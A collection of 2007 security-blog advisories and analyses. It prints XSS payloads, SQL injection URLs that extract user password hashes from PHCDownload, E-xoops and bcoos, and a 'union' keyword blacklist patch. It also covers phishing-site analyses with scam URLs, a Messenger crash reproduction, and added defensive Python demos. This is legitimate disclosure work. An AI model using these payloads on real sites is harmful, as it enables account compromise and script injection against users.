XSS flaw & possible SQL injection in search.php in PHCDownload

Friday, December 28, 2007
###############################################
XSS flaw & possible SQL injection in PHCDownload
vendor url: http://www.phpcredo.com/
Advisory: http://lostmon.blogspot.com/2007/12/xss-flaw-posible-sql-injection-in.html
vendor notified: YES    exploit available: YES
###############################################

New XSS flaw & possible SQL injection in search.php

PHCDownload contains a flaw that allows a remote cross-site
scripting attack. The flaw exists because the application does
not validate the 'string' variable upon submission to the
'search.php' script.

This allows an attacker to craft a URL that executes arbitrary
script in a user's browser within the trust relationship between
the browser and the server, leading to a loss of integrity.

Versions:

1.1.0 affected.

Example:

We can inject plain HTML or JavaScript:

Code:

"><h1><a href="http://lostmon.blogspot.com">Lostmon</a> Was Here !!!</h1><br><h1>XSS Pow@ !!!</h1><p><iframe src="http://lostmon.blogspot.com"></iframe></p>

or inject the same payload URL-encoded (hex escapes):

Code:

%22%3E%3C%68%31%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%3C%2F%61%3E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%62%72%3E%3C%68%31%3E%58%53%53%20%50%6F%77%40%20%21%21%21%3C%2F%68%31%3E%3C%70%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%70%3E
The payload goes into the 'string' parameter of search.php:

http://localhost/phcdownload/search.php?string=[XSS-CODE]
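Both payloads above start with "> because the reflected value lands inside an HTML attribute: the quote closes the attribute and the > closes the tag. The following added example (my code, not PHCDownload's or the advisory's) models search.php echoing 'string' back into the value attribute of the search box, renders the advisory's payload and a second, bracket-free payload through no escaping, tag-only escaping and full htmlspecialchars-style escaping, then parses the result to see whether the input stayed inside its attribute. The form markup is an assumption; the real PHCDownload template is not on the page.

```python
import html
from html.parser import HTMLParser

# Payload quoted in the advisory above (the unencoded form).
ADVISORY_PAYLOAD = (
    '"><h1><a href="http://lostmon.blogspot.com">Lostmon</a> Was Here !!!</h1>'
    '<br><h1>XSS Pow@ !!!</h1><p><iframe src="http://lostmon.blogspot.com"></iframe></p>'
)

# Constructed payload with no < or >: it needs no new tag, it just closes the
# attribute value and adds an event handler to the existing input element.
ATTRIBUTE_PAYLOAD = '" autofocus onfocus="alert(document.domain)'

# Assumed stand-in for the search form: the submitted string is reflected
# into the value attribute. The real PHCDownload template is not on the page.
TEMPLATE = '<form action="search.php"><input type="text" name="string" value="{value}"></form>'


def escape_none(s):
    # Vulnerable: what the advisory describes, the raw value echoed back.
    return s


def escape_angle_only(s):
    # Common half-fix: neutralise tags but leave quotes alone.
    return s.replace('<', '&lt;').replace('>', '&gt;')


def escape_full(s):
    # Equivalent of PHP htmlspecialchars($s, ENT_QUOTES): &, <, >, " and '.
    return html.escape(s, quote=True)


def render(value, escaper):
    return TEMPLATE.format(value=escaper(value))


class TagCollector(HTMLParser):
    """Records every start tag with its attributes, in document order."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

    handle_startendtag = handle_starttag


def reflected_safely(value, escaper):
    """True if the reflected value stayed data: the page still parses to just
    the form and one input, the input gained no attributes, and its value
    attribute decodes back to exactly what was submitted."""
    parser = TagCollector()
    parser.feed(render(value, escaper))
    if [name for name, _ in parser.tags] != ['form', 'input']:
        return False
    attrs = parser.tags[1][1]
    return set(attrs) == {'type', 'name', 'value'} and attrs['value'] == value


def survey():
    """Safe/unsafe verdict for every payload and escaper combination."""
    escapers = {'none': escape_none, 'angle_only': escape_angle_only, 'full': escape_full}
    return {(label, name): reflected_safely(payload, fn)
            for label, payload in (('advisory', ADVISORY_PAYLOAD), ('attribute', ATTRIBUTE_PAYLOAD))
            for name, fn in escapers.items()}


if __name__ == '__main__':
    for (payload, escaper), safe in survey().items():
        print(f'{payload:9s} {escaper:10s} {"safe" if safe else "BREAKS OUT"}')
```

Stripping angle brackets stops the advisory's payload from creating new elements but not from leaving the attribute, which is why the fix for search.php has to escape the quote characters as well (htmlspecialchars with ENT_QUOTES in PHP).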

The same variable is also vulnerable to SQL injection.

Looking at the source of search.php, around line 36 we have:

Code:
// Prepare search query
if( $kernel->config['archive_search_mode'] == 1 )
{
$search_syntax = "MATCH( f.file_name, f.file_description, f.file_version, f.file_author ) AGAINST ( '*{$kernel->vars['string']}*' IN BOOLEAN MODE )";
}
else
{
$search_syntax = "MATCH( f.file_name, f.file_description, f.file_version, f.file_author ) AGAINST ( '*{$kernel->vars['string']}*' )";
}
The value of 'string' is interpolated directly into the SQL query, inside a single-quoted literal and without escaping, so a quote in the input breaks out of the literal.

We can try to break the query and disclose it with a single quote:

http://localhost/phcdownload/upload/search.php?string='

I made several probes, but I have not found a working exploit or an
exploitable angle for this issue; still, it needs to be patched.

Thanks to estrella for being my light
Thanks to all Lostmon's Group Team

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)

--
Curiosity is what moves the mind....

E-xoops multiple variables/scripts SQL injection

Sunday, December 09, 2007
############################################
E-xoops multiple variables/scripts SQL injection
vendor url: http://www.e-xoops.com
Advisory: http://lostmon.blogspot.com/2007/12/e-xoops-multiple-variablescripts-sql.html
vendor notified: NO    exploits available: YES
############################################



E-xoops is a content/community management system written in PHP with MySQL.

E-xoops contains a flaw that may allow an attacker to carry out
an SQL injection attack. The issue is due to multiple scripts not
properly sanitizing user-supplied input to the 'lid', 'bid' and
'gid' variables. This may allow an attacker to inject or manipulate
SQL queries in the backend database.



#################
Versions:
#################

E-Xoops 1.08
E-Xoops 1.05 Rev3
E-Xoops 1.05 Rev2
E-Xoops 1.05 Rev1

and possibly earlier versions.

#################
Solution:
#################

No solution available at this time.
Try to edit the source code.
You can look at this post in my group
to patch E-xoops, because the source
code is very similar to the bcoos CMS:

http://groups.google.com/group/lostmon/browse_thread/thread/59f3b836fad5b009

And here you have a source reference for
E-xoops 1.0.8: http://phpxref.com/xref/exoops/nav.html

#################
Timeline:
#################

Discovered: 25-11-2007
Vendor notified: --------
Vendor response: -------
Disclosure: 09-12-2007


#################
SQL injections:
#################


http://localhost/e-xoops/modules/mylinks/ratelink.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201

http://localhost/e-xoops/modules/adresses/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201

http://localhost/e-xoops/modules/mydownloads/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201

http://localhost/e-xoops/modules/mysections/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201

http://localhost/e-xoops/modules/myalbum/ratephoto.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201

http://localhost/e-xoops/modules/banners/click.php?op=click&bid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201

http://localhost/e-xoops/modules/arcade/index.php?act=show_stats&gid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201

http://localhost/e-xoops/modules/arcade/index.php?act=play_game&gid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201


#################### €nd ########################



Thanks to estrella for being my light
Thanks to FalconDeOro for his support
Thanks to Imydes from http://www.imydes.com


Possible patch for SQL injections in bcoos 1.0.10

Sunday, December 02, 2007
############################################
Possible patch for SQL injections in bcoos 1.0.10
vendor url: http://www.bccos.net
Patch by Lostmon. (lostmon@gmail.com)
Original article: http://lostmon.blogspot.com/2007/12/posible-patch-for-sql-injections-in.html
############################################

In the last week some researchers and I have found multiple
critical SQL injections in bcoos 1.0.10 and prior versions.

After a quick look at the source code of the product
I have found a simple patch. This is not an official patch, but it
works until the vendor releases an official patch or
a new version.

You can use this modification to mitigate the SQL injections
listed in the advisories; it only needs to detect the 'union' SQL
keyword in the parameter. Note that a keyword blacklist of this kind
stops the published payloads but not every encoding of them: the ids
involved are integers, so casting them to int (intval()) is the
robust fix.


##########################
Sample code
##########################
You need to add this code to all affected files:


if (eregi("%20union%20", $lid) ||eregi(" union ", $lid) || eregi("\*union\*", $lid) || eregi("\+union\+", $lid) || eregi("\*", $lid))
{
echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";
redirect_header("index.php");
die();
}

###########################
patch mylinks/ratelink.php
############################

Open ratelink.php; around line 73 there is an else branch, } else {

Insert the code just before the else, like this:

}
if (eregi("%20union%20", $lid) ||eregi(" union ", $lid) || eregi("\*union\*", $lid) || eregi("\+union\+", $lid) || eregi("\*", $lid))
{
echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";
redirect_header("index.php");
die();
}
else {

Save and close the file; it is now patched.
Try the exploit to verify:

http://localhost/bcoops/modules/mylinks/ratelink.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201

###############################
patch adresses/ratefile.php
##############################

Open ratefile.php; around line 70 there is an else branch, } else {

Insert the code just before the else, like this:

}
if (eregi("%20union%20", $lid) ||eregi(" union ", $lid) || eregi("\*union\*", $lid) || eregi("\+union\+", $lid) || eregi("\*", $lid))
{
echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";
redirect_header("index.php");
die();
}
else {

Save and close the file; it is now patched.
Try the exploit to verify:

http://localhost/bcoops/modules/adresses/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201

###############################
patch mysections/ratefile.php
##############################

Open ratefile.php; around line 77 there is an else branch, } else {

Insert the code just before the else, like this:

}
if (eregi("%20union%20", $lid) ||eregi(" union ", $lid) || eregi("\*union\*", $lid) || eregi("\+union\+", $lid) || eregi("\*", $lid))
{
echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";
redirect_header("index.php");
die();
}
else {

Save and close the file; it is now patched.
Try the exploit to verify:

http://localhost/bcoops/modules/mysections/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201

############################
patch banners/click.php
############################

Open click.php; around line 5 you have $bid = $_GET['bid'];

Insert the code just after this line:

if (eregi("%20union%20", $bid) ||eregi(" union ", $bid) || eregi("\*union\*", $bid) || eregi("\+union\+", $bid) || eregi("\*", $bid))
{
echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";
redirect_header("index.php");
die();
}

Save and close the file; it is now patched.
Try the exploit to verify:

http://localhost/bcoops/modules/banners/click.php?bid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201

###########################
patch arcade/index.php
############################


Open index.php; around line 15 you have a switch($act)

Insert the code just before the switch:


if (eregi("%20union%20", $gid) ||eregi(" union ", $gid) || eregi("\*union\*", $gid) || eregi("\+union\+", $gid) || eregi("\*", $gid))
{
echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";
redirect_header("index.php");
die();
}

You can patch all of the rate files with the same code, because
the rating code and functions are similar across the different modules.
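The following added example (my code, not bcoos, E-xoops or this patch) models in Python, on an in-memory SQLite database, what the UNION payloads listed in the E-xoops and bcoos advisories above do to a rating query, re-implements the eregi() blacklist from this patch, and shows one encoding the blacklist lets through (a tab, %09 in the URL, instead of %20 around UNION), next to the integer cast that closes the hole regardless of encoding. The table names, the sample rows and the query shape are assumptions; the real bcoos queries are not on the page.

```python
import re
import sqlite3

# Constructed sample database standing in for a bcoos install: a links table
# looked up by lid and the users table the advisory payloads read from.
PASSWORD_HASH = 'e10adc3949ba59abbe56e057f20f883e'   # constructed sample value


def build_db():
    db = sqlite3.connect(':memory:')
    db.executescript(f'''
        CREATE TABLE bcoos_mylinks_links (lid INTEGER, title TEXT);
        INSERT INTO bcoos_mylinks_links VALUES (1, 'first link'), (2, 'second link');
        CREATE TABLE bcoos_users (uid INTEGER, uname TEXT, pass TEXT);
        INSERT INTO bcoos_users VALUES (1, 'admin', '{PASSWORD_HASH}');
    ''')
    return db


# Decoded value of lid= in the advisory URLs above (%20 becomes a space).
UNION_PAYLOAD = '-1 UNION SELECT pass FROM bcoos_users LIMIT 1'
# Same statement with tabs (%09 in the URL) instead of spaces around UNION.
TAB_PAYLOAD = '-1\tUNION\tSELECT pass FROM bcoos_users LIMIT 1'


def lookup_vulnerable(db, lid):
    """Assumed shape of the affected query: the raw GET parameter is pasted
    into the WHERE clause, which is what lets the UNION run."""
    sql = 'SELECT title FROM bcoos_mylinks_links WHERE lid=%s' % lid
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def passes_blacklist(lid):
    """Python rendering of the eregi() chain in the patch above. eregi() is
    case-insensitive, so the patterns are matched with re.IGNORECASE."""
    patterns = (r'%20union%20', r' union ', r'\*union\*', r'\+union\+', r'\*')
    return not any(re.search(p, lid, re.IGNORECASE) for p in patterns)


def lookup_blacklisted(db, lid):
    # What the patched scripts do: refuse (redirect) on a match, else carry on.
    if not passes_blacklist(lid):
        return None
    return lookup_vulnerable(db, lid)


def lookup_fixed(db, lid):
    """The robust fix: lid is an integer id, so reject anything that is not one
    (PHP intval() would coerce instead) and bind it as a query parameter."""
    if not re.fullmatch(r'-?\d+', lid):
        return None
    row = db.execute('SELECT title FROM bcoos_mylinks_links WHERE lid=?',
                     (int(lid),)).fetchone()
    return row[0] if row else None


def demo():
    db = build_db()
    return {
        'legit/vulnerable': lookup_vulnerable(db, '2'),
        'union/vulnerable': lookup_vulnerable(db, UNION_PAYLOAD),
        'union/blacklist': lookup_blacklisted(db, UNION_PAYLOAD),
        'tab/blacklist': lookup_blacklisted(db, TAB_PAYLOAD),
        'tab/fixed': lookup_fixed(db, TAB_PAYLOAD),
        'legit/fixed': lookup_fixed(db, '2'),
    }


if __name__ == '__main__':
    for case, result in demo().items():
        print(f'{case:18s} -> {result}')
```

The blacklist stops the exact URLs printed in the advisories, which is what the verification steps above test, but any other whitespace between the keywords (tab, newline) reaches the database unchanged. Validating the id as an integer needs no knowledge of the payload at all.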

###################-€nd-#######################

Thanks to estrella for being my light.
Thanks to all Lostmon Group Team!!
Thanks to all OSVDB manglers!!! Waiting for OSVDB 2.0!!!
Thanks to orinico, now I know how to do it :D


Bcoops adresses/ratefile.php lid variable SQL injection

Friday, November 30, 2007
########################################################
Bcoops adresses/ratefile.php lid variable SQL injection
vendor url: http://www.bcoops.net
Advisory: http://lostmon.blogspot.com/2007/11/bcoops-adressesratefilephp-lid-variable.html
vendor notified: NO    exploits available: YES
########################################################



bcoos is a content/community management system written in PHP with MySQL.

bcoops contains a flaw that may allow an attacker to carry out
an SQL injection attack. The issue is due to the adresses/ratefile.php
script not properly sanitizing user-supplied input to the 'lid'
variable. This may allow an attacker to inject or manipulate SQL
queries in the backend database.



#################
Versions:
#################

bcoops 1.0.10 and earlier: vulnerable

#################
Solution:
#################

No solution at this time!!!
Try to edit the source code
or try another product.

#################
Timeline:
#################

Discovered: 25-11-2007
Vendor notified: --------
Vendor response: -------
Disclosure: 30-11-2007


#################
SQL injections:
#################


http://localhost/bcoops/modules/adresses/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201



####################### €nd ##############################



Thanks to estrella for being my light
Thanks to FalconDeOro for his support
Thanks to Imydes from http://www.imydes.com


Bcoops SQL injection and Cross-site scripting

Wednesday, November 28, 2007
####################################################
Bcoops SQL injection and Cross-site scripting
vendor url: http://www.bcoops.net
Advisory: http://lostmon.blogspot.com/2007/11/bcoops-sql-injection-and-cross-site.html
vendor notified: YES    exploits available: YES
####################################################



bcoos is a content/community management system written in PHP with MySQL.

bcoops contains a flaw that may allow an attacker to carry out
an SQL injection attack. The issue is due to the arcade/index.php
script not properly sanitizing user-supplied input to the 'gid'
variable; the myalbum/ratephoto.php script and its 'lid' variable
are affected by the same flaw. This may allow an attacker to inject
or manipulate SQL queries in the backend database.



bcoops also contains a flaw that allows a remote cross-site scripting
attack. This flaw exists because the application does not validate the
'day' and 'year' variables upon submission to the modules/theecal/display.php
script. This allows an attacker to craft a URL that executes arbitrary
script in a user's browser within the trust relationship between
the browser and the server, leading to a loss of integrity.


#################
Versions:
#################

bcoops 1.0.10 and earlier: vulnerable

#################
Solution:
#################

No solution at this time!!!

#################
Timeline:
#################

Discovered: 25-11-2007
Vendor notified: 27-11-2007
Vendor response: -------
Disclosure: 28-11-2007


#################
SQL injections:
#################

http://localhost/modules/arcade/index.php?act=show_stats&gid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201

http://localhost/modules/myalbum/ratephoto.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201

http://localhost/modules/mylinks/ratelink.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201


#####################
Cross-site Scripting
#####################


http://localhost/modules/ecal/display.php?day=17&month=11&year=2007"><script>alert()</script>


http://localhost/modules/ecal/display.php?day=1"><script>alert()</script>&month=11&year=2007



####################### €nd ############################



Thanks to estrella for being my light
Thanks to FalconDeOro for his support
Thanks to Imydes from http://www.imydes.com


First phishing against Google Checkout

Thursday, October 25, 2007
######################################################
First phishing against Google Checkout
Vendor url: http://checkout.google.com/
Original article: http://lostmon.blogspot.com/2007/10/primer-phishing-sobre-google-checkout.html
#######################################################


Google Checkout is one more of Google's services. It lets you
search and buy through Google, connecting buyers and sellers
in a system analogous to eBay and some others.

Both buying and selling require a Google account plus several
banking details, such as a credit card.


Today I received an email urging me to verify my Gmail account.

[email image]



Looking at part of the email headers, we immediately see that
its origin is illegitimate:

Received-SPF: neutral (google.com: 194.100.2.122 is neither
permitted nor denied by best guess record for domain of
anonymous@tarmo.citius.info) client-ip=194.100.2.122;

Authentication-Results: mx.google.com; spf=neutral
(google.com: 194.100.2.122 is neither permitted nor denied
by best guess record for domain of anonymous@tarmo.citius.info)
smtp.mail=anonymous@tarmo.citius.info
Received: from tarmo.citius.info (unknown [62.237.50.26])



After following the link this scam points to, I see that instead
of going, as one would expect, to a password-theft attempt, it
leads straight to Google Checkout. I believe this is the first
phishing aimed at a Google service: since it tries to steal the
credit card number, that is, money itself, it can be considered
phishing and not a simple scam.

[scam screenshot]



Looking closely at the URL of the hoax we see several things:

1- They tried to imitate the Gmail domain through a subdomain
that has nothing to do with Gmail.
2- They tried to imitate the Gmail URL by adding several
variables such as 'Auth'.
3- The URL in the mail does not work as-is, because they forgot
to put a '?' so the URL would work directly.
4- The hoax can be reached directly at the web root.

http://www.gmail.com.update.digitalwestex.org/auth=DQAAAHIAAAAPQ-JRZfCChKlJsPpjaMLWnBzKRWEZQ02EbWrMJOO3uhnTGKoqpILRxFd_k0EdD8g6a6dANfaOogLt1fjcqR0JYdy4mGaSf8R6XjoZXrHiiHXeDk8h93nAKGZBhZbmpHOYevyYbPCp52S3Mz4y8EAtWF5o7-QGpnluuZvu1h11Lw&shva=0.html

As always, I don't know why phishers don't take more care and,
as usual, leave the directory where the files are stored
exposed...


http://www.gmail.com.update.digitalwestex.org/Welcome to Google Checkout!_fichiers/

[directory listing image]



In the directory itself we find several JavaScript files:

1- 112228238-addressjs.js
2- creditcard.js
3- ukcreditcard.js
4- XmlHttp.js
5- TimeZones.js

Among other things, these take care of tracking where we come
from and whether we clicked the link in the email, caching our
session, and also try to intercept several of the actions we take
after visiting the page, among them validating whether the card
number entered is correct.

The interesting one is 112228238-addressjs.js :)

Looking at the page source we also see that if we enter data in
the hoax form, besides being captured, a new Google Checkout
account is created.

Remember that a new vulnerability in Google Gmail was recently
discovered which allows interacting with and setting filters on
our mail, so through a malicious scam, besides creating a
Checkout account, it could redirect Gmail messages to another
account without the victim's knowledge.

[vulnerability reference]
http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/

Apart from the usual measures, not trusting this kind of email
and checking that the site you visit really is the legitimate
site, I recommend that if you use Internet Explorer with the
Google toolbar you always close the session in the browser (the
green button) before browsing to another site, and if you use
Firefox or another browser, log out through the site's logout
link; this way we avoid many of the ways an attacker could try
to take over our session.
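The two checks applied by hand above, the SPF result in the headers and the look-alike host in the link, as an added example in Python (my code, not something from the post). The headers are the ones quoted above, re-folded with leading whitespace on the continuation lines as a mail client delivers them; the URL is the scam host with its path dropped; "registrable domain" is simplified to the last two labels, an assumption that breaks on suffixes like co.uk, where a public suffix list is needed.

```python
import re
from urllib.parse import urlsplit

# Headers quoted in the post, re-folded with leading whitespace on the
# continuation lines (constructed layout; the text is the post's).
SAMPLE_HEADERS = (
    "Received-SPF: neutral (google.com: 194.100.2.122 is neither\n"
    "  permitted nor denied by best guess record for domain of\n"
    "  anonymous@tarmo.citius.info) client-ip=194.100.2.122;\n"
    "Received: from tarmo.citius.info (unknown [62.237.50.26])\n"
)

# Scam host from the post, path omitted.
SCAM_URL = 'http://www.gmail.com.update.digitalwestex.org/'

# Brands whose names should only ever appear as the registrable domain.
TRUSTED_DOMAINS = {'gmail.com', 'google.com'}
BRAND_WORDS = ('gmail', 'google')


def unfold(headers):
    """Join RFC 5322 folded header lines so each header is a single line."""
    return re.sub(r'\r?\n[ \t]+', ' ', headers)


def spf_verdict(headers):
    """Return (result, client_ip) from the Received-SPF header, or (None, None)."""
    m = re.search(r'^Received-SPF:\s*(\w+)\b.*?client-ip=([0-9.]+)',
                  unfold(headers), re.MULTILINE)
    if not m:
        return None, None
    return m.group(1).lower(), m.group(2)


def registrable_domain(host):
    # Simplification: last two labels. A real check uses the public suffix list.
    return '.'.join(host.lower().rstrip('.').split('.')[-2:])


def lookalike_brand(url):
    """Return the brand a host is imitating, or None if the host really belongs
    to a trusted domain. www.gmail.com.update.digitalwestex.org carries
    'gmail.com' as a subdomain of digitalwestex.org, so it is a look-alike."""
    host = (urlsplit(url).hostname or '').lower()
    if registrable_domain(host) in TRUSTED_DOMAINS:
        return None
    for brand in BRAND_WORDS:
        if brand in host:
            return brand
    return None


def suspicious(headers, url):
    """List of reasons to distrust the mail; empty means nothing was flagged."""
    reasons = []
    result, ip = spf_verdict(headers)
    if result != 'pass':
        reasons.append(f'spf={result} for sending host {ip}')
    brand = lookalike_brand(url)
    if brand:
        reasons.append(f'link host {urlsplit(url).hostname} imitates {brand}')
    return reasons


if __name__ == '__main__':
    for reason in suspicious(SAMPLE_HEADERS, SCAM_URL):
        print('flag:', reason)
```

An SPF result of neutral only says the sending host was neither authorised nor forbidden; on its own it is weak evidence, which is why the host check on the link is the second signal.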


Thanks to Imydes of www.imydes.com for his support.
Thanks to FalconDeOro for his patience.


Password theft through a Google Gmail scam

Thursday, October 04, 2007
#####################################################
Password theft through a Google Gmail scam
Password theft through phishing at E-bullion
Discoverers and researchers: Lostmon(1) Imydes(2)
Original article: http://www.imydes.com/?p=117
Date: 03/10/2007
####################################################

This article comes from joint work with
Imydes; the original article is at: http://www.imydes.com/?p=117

--
As you surely all know, Google has quite a few services behind it,
to name some:
Google Adsense, Google Docs, Gmail, Blogger, Picasa...

This Gmail Accounts scam, whose goal is to steal the password of
the careless user, could give access to all of the Google services
just mentioned.

The scam consists of imitating a Google form titled "My Account",
pretending to be a manager for editing the personal information
of the Google account.

In the form we find the following fields:

Username
Password
First name
Last name
Nick name
Zip code
Country

(A small note: a moderately experienced user who falls for it the
first time will notice a small mistake, which is that the Password
field is not masked with **** and the password is shown in plain
sight, and the Country field shows a drop-down with several
countries which, not being encoded in UTF-8, appear with "strange
characters".)

[image: Gmail Accounts Scam, Imydes]

If we fill in the fields named above and click "Save", we see
that it sends us to "update.php", where presumably the information
entered in the form is stored (I don't know whether in a database
or in a file).

On the other hand, if we enter the site directly without the www
we see that the scam's creators forgot to put an index page to
stop you from seeing the contents of the server root.

In this oversight we can see a system for mass-mailing the scam
(specifically, the web address is this: http://us-gmail.com/mail.php).

We can also see a web page that presumably follows the same
pattern as the Gmail scam but for e-Bullion
(web http://us-gmail.com/e-lbullion/). We can see that in the
case of e-bullion it goes to "/secure/update.php".

[image: E-bullion phishing]

Credits:

Imydes (scam documentation and research) (www.imydes.com)
Lostmon (discoverer of this scam and research) (http://lostmon.blogspot.com)
Lostmon Group (http://groups.google.com/group/lostmon)

Thanks to XiuX, MARNI, itimad, Yeremat, Soed, Newcastle for trusting me.

Windows Live Messenger malformed file overflow DoS remote exploitation.

Friday, September 21, 2007
##############################################################
Windows Live Messenger malformed file overflow remote exploitation.
(windows ole32.dll MS07-024) (windows GDI MS07-046)
vendor url: http://www.microsoft.com/ , http://get.live.com/messenger/overview
Advisory: http://lostmon.blogspot.com/2007/09/windows-live-messenger-jpg-overflow.html
Vendor notified: YES    Vendor confirmed: yes (DoS issue)    Exploitation included: YES
BID: 25795
#############################################################

A buffer overflow exists in Windows Live Messenger. The GDI engine
fails to handle malformed data in image files, resulting in a buffer
overflow. With a specially crafted jpg, wmf, gif, doc or ico file,
an attacker can cause a DoS, and possibly arbitrary code execution
(RCE not confirmed), resulting in a loss of integrity.

############
History
############

After installing the patch for the vulnerability in Windows GDI
(MS07-046) I made several probes with some malformed image files
(jpg, gif, wmf, ico, doc) and I get the same result before installing
this patch and after installing it :(

###############
versions tested
###############

All of these versions with Windows Live Messenger 8.1.
I don't know whether other versions of Windows are
vulnerable too, but I think all systems listed in the
Microsoft bulletin MS07-046 are vulnerable.

Windows XP Media Center Edition 2002 Service Pack 2
Windows XP Pro
Windows XP Home

###############
Solution
###############
No solution was available at this time, but:

DON'T SHARE ANY FOLDER IN MESSENGER UNTIL
THERE IS A SOLUTION OR PATCH !!!!!!

The vendor plans to address this issue
in the next service pack.

###############
Timeline
###############

Discovered: 20-08-2007
Vendor initial contact: 23-08-2007
Vendor response: 24-08-2007
Vendor patch: ---
Private disclosure: 17-09-2007
Public disclosure:

##############
Impact
##############

A remote user can cause a DoS in the application.
If the patch for Windows Metafiles (wmf) does not
work correctly, a remote user might execute arbitrary code,
but I am not sure that RCE can be achieved.


##########################
Explanation Step By Step
##########################

What do we need?

- Two machines with Windows Live Messenger 8.1, running
- two of the systems listed in the versions section.
- A malformed image (jpg, gif or wmf).

Machine 1 => Messenger 8.1 & Windows XP Media Center 2002, fully patched. [victim]
Machine 2 => Messenger 8.1 & Windows XP Home, fully patched. [attacker]

Windows Live Messenger 8.1 has an option to share folders with other contacts.
The first time you share a folder with a contact, Messenger asks for confirmation;
once you accept, the folder is shared automatically from then on.

To see the folder location you can go to My Computer / MSN
folders / [VICTIM]@hotmail.com

and the physical path is:

C:\Documents and Settings\[YOUR_USER]\Configuración local\Datos de programa\Microsoft\Messenger\[ATTACKER]@hotmail.com\Sharing Folders\[VICTIM]@hotmail.com

(on a Spanish install; "Configuración local\Datos de programa" is
"Local Settings\Application Data" on an English one).

1 - Log in to Messenger on both machines.
2 - On machine 2, open a conversation window with machine 1.
3 - On machine 2, click the icon to share a folder.
4 - On machine 1, accept the share.
5 - On machine 1, put a new folder inside the shared folder and, inside it, a
malformed jpg file; do this through the physical path, not through Messenger,
because if you drag & drop the image into the shared folder inside Messenger,
the application crashes.

6 - Close the shared folder on both machines.

Now, on machine 1, the physical path of the shared folder holds
a folder with a malformed image.

7 - On machine 2, click the share icon. When Messenger on machine 1
tries to open and send the list of files, Messenger on
machine 1 crashes, and if you don't terminate the process
Windows crashes too, with a blue screen of death :S

Now you can crash Messenger on the victim's machine every time
the share icon is clicked.
The victim needs to delete this folder to stop this situation.

OK, think further: we need to get an image onto the victim's machine.

Can we put it there with no interaction from the victim?... yes,
the victim only needs to make one click. :)

If we have a shared folder with the victim, and victim and attacker are online,
the victim can put a new folder with the malformed image in their local
shared folder, and in the attacker's conversation window a new message
appears saying...

"The victim has added files to the shared folder, would you like to
synchronize or update?" ...or something similar.

If the attacker clicks yes... Messenger on the attacker's machine crashes,
and now the victim can crash the attacker's Messenger every time.
The attacker needs to delete the folder with the evil jpg.

I have an easier way to exploit and/or manipulate the malformed file:

1 Share a folder with a contact in Messenger.
2 Close the shared folder in Messenger.
3 Open a cmd and go to the physical path of the shared folder.
4 Generate the malformed file with Perl, Python or similar.

Once the file is generated, if you have a conversation window open with
the victim, your Messenger says "all files are uploaded" when it finishes
synchronizing with the victim's Messenger, and the victim's Messenger says
"user so-and-so has updated the shared folder", or something similar.

Now the exploit is on your machine and on the victim's machine.

If you click the shared folder icon while the exploit is still on your
machine, your Messenger crashes; but if, after synchronization, you delete
the malformed file from your local folder, then when you click the shared
folder icon and Messenger tries to synchronize the shared folder on the
victim's machine with yours, Messenger on the victim's machine crashes.

I think some of these issues with malformed files
come from the extended file attributes.

If anyone would like to dig deeper, here are two related articles:

First part:

http://lostmon.blogspot.com/2007/06/buffer-overflow-in-extended-file.html

Second part :

http://lostmon.blogspot.com/2007/08/windows-extended-file-attributes-buffer.html

and the related Microsoft bulletins:

Vulnerability in ole32.dll :

http://www.microsoft.com/technet/security/bulletin/ms07-024.mspx

Vulnerability in gdi32.dll :

http://www.microsoft.com/technet/security/bulletin/ms07-046.mspx



########################## €nd #####################

Thanks to estrella for being my light.
Thanks to Dave from security center for his patience.
Thanks to FalconDeOro (patience is a virtue, young Jedi)
Thanks to all Lostmon Group Team.
Thanks to N0xTrUm from N0xTrUm Tecnologies http://n0xtrum.blogspot.com/
Thanks to ANELKAOS from http://www.elhacker.net/ for his support.


